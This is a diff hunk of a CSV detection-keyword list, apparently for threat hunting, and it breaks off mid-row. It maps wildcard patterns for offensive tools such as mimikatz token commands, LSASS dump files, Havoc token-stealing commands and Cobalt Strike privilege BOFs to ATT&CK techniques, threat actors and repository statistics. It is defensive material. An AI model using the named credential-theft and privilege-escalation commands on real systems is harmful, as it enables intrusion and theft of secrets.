@@ -17739,37 +17923,37 @@ "*tmp*ciscophones.tgz*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*tmp*lsass_*.dmp*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*Tmprovider.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*to_powershell.ducky_script*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*to_powershell.ducky_script*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*toggle_privileges.cna*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*toggle_privileges_bof.*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*Toggle_Token_Privileges_BOF*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*ToggleWDigest*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" -"*token find-tokens*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*token impersonate *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*token privs-get*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*token privs-list*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*token steal *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*token 
find-tokens*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token impersonate *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token privs-get*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token privs-list*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*token steal *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - 
T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*token* -CreateProcess * -ProcessId *","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*token* -ImpersonateUser -Username *","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*token::elevate*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*token::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*token::revert*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*token::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*token::whoami*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::elevate*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::revert*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*token::whoami*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*TokenDump.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*TokenKidnapping.cpp*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege 
Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" -"*TokenKidnapping.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*TokenKidnapping.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*TokenKidnapping.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" -"*tokenprivs.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*tokenprivs.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*tokenprivs.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*tokenprivs.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*TokenStealing.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*TokenStealing.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*TokenStomp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*TokenStomp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - 